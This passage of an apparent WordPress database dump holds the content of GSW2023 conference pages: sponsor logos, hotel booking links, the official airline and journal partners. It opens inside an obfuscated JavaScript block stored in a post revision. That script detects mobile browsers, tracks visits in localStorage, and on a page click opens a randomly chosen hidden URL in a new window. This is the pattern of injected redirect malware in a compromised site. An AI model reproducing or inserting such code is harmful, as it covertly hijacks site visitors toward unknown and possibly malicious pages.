)|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-08-13 12:19:07','2023-08-13 12:19:07','',3066,'https://gsw2023.com/?p=5105',0,'revision','',0),
(5106,1,'2023-08-13 12:19:56','2023-08-13 12:19:56','<h1 style=\"text-align: center;\"><span style=\"font-size: 36pt; color: #0000ff;\"><strong>Under the auspices of </strong></span>\r\n<span style=\"font-size: 36pt; color: #0000ff;\"><strong>H.E. Professor Mostafa Madbouly,</strong></span>\r\n<span style=\"font-size: 36pt; color: #0000ff;\"><strong>Prime Minister of the Arab Republic of Egypt</strong></span></h1>\r\n[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1687219449581{margin-top: 115px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1689081933017{margin-top: 105px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\">Prime Sponsors</span></h4>\r\n&nbsp;\r\n\r\n<a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1689081968974{margin-top: 160px !important;}\"]\r\n\r\n<a href=\"https://www.mbrsc.ae/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5093 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/MBRSC-LOGO_1-01-300x149.png\" alt=\"\" width=\"300\" height=\"149\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1689081968955{margin-top: 115px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1689081337215{margin-top: 40px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\r\n&nbsp;\r\n\r\n<a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689080719428{margin-top: 0px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081395417{margin-top: 10px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\r\n<a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]\r\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]\r\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\r\n<span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690460056235{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" />\r\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\r\n\r\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\r\n<a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\r\n<a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a>\r\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\r\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\r\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span>\r\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span>\r\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span>\r\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\r\n\r\n<h1 style=\"text-align: center;\">Journals partner</h1>\r\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\r\n\r\n<h3></h3>\r\n&nbsp;\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\r\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]\r\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\r\n[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\r\n<h5></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\r\n<h4></h4>\r\n<img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" />\r\n\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]\r\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\r\n<h4></h4>\r\n<a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a>\r\n\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570507588{margin-top: 50px !important;}\"]\r\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\r\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Pharaohs Cruising Restaurant</strong></h5>\r\n<img class=\"alignnone size-medium wp-image-4791 